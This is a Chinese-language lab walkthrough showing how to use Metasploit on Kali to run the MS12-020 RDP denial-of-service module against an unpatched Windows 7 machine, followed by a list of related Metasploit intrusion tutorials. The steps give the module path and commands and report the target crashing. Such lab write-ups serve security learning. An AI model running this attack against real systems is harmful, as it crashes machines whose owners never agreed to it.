kail利用msf工具对MS12-020漏洞进行渗透测试

2024-05-16 10:21:46

kail利用msf工具对MS12-020漏洞进行渗透测试

MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞

kail利用msf工具对MS12-020漏洞进行渗透测试：

实验环境：

工具：metasploit

靶机两台：windows 7sp1和kali2020

攻击机IP地址：192.168.29.129

被攻击机IP地址：192.168.29.128

实验条件：两台机子可以互通的，并且windows 7sp1（无补丁）开启了3389端口，防火墙是关闭的。

步骤：

1、首先打开kali主机，打开终端，输入“msfconsole“，进入Metasploit控制台

2、搜索ms12-020漏洞利用模块，找到auxiliary/dos/windows/rdp/ms12_020_maxchannelids

3、使用模块 use + auxiliary/dos/windows/rdp/ms12_020_maxchannelids利用这个漏洞

4、查看当前模块所需配置项 show options ，RHOST 需设为远程靶机的IP地址

5、设置配置项，如set RHOST xxx.xxx.xx.x(为攻击目标的IP地址)

6、实施攻击 exploit 或者run

7、查看windows7sp1，成功蓝屏并且重启

kail利用msf工具对MS12-020漏洞进行渗透测试相关推荐

kail利用msf工具对ms17-010（永恒之蓝）漏洞入侵渗透Win7
kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...
kail利用msf工具对ms11-003漏洞入侵渗透Win7
前言: windows7IE溢出攻击实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...
kail利用msf工具对ms10-087漏洞入侵渗透WinXP
1.实验环境: Kali2020:10.20.29.129 Windows 2003:10.20.29.137 两台虚拟机能够相互ping通 2.实验步骤 1, 启动Metasploit 2,查找和M ...
kali利用msf工具对ms08-067漏洞入侵靶机（win xp2）
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
针对HFS 2.3漏洞进行渗透测试提权（HFS：HttpFileServer）
利用Metasploit对HFS 2.3渗透攻击提权针对HFS 2.3漏洞进行渗透测试提权(HFS:HttpFileServer) msf6 > search hfs Matching Mod ...
Kali利用msf对MS10_061漏洞进行渗透测试
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...
kali利用MSF对永恒之蓝漏洞入侵windows7
warning 本文目的并不是教会学者入侵win7主机, 而是加强防范 kali入侵win7 步骤一:实验环境的搭建攻击机:kali(2022.3版本) 靶机:win7 专业版 sp1 x64位安 ...
DC系列漏洞靶场-渗透测试学习复现（DC-1）
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
如何查找APP漏洞并渗透测试解决网站被黑客攻击
APP渗透测试目前包含了Android端+IOS端的漏洞检测与安全测试,前段时间某金融客户的APP被黑客恶意攻击,导致APP里的用户数据包括平台里的账号,密码,手机号,姓名都被信息泄露,通过老客户的介 ...

最新文章

热门文章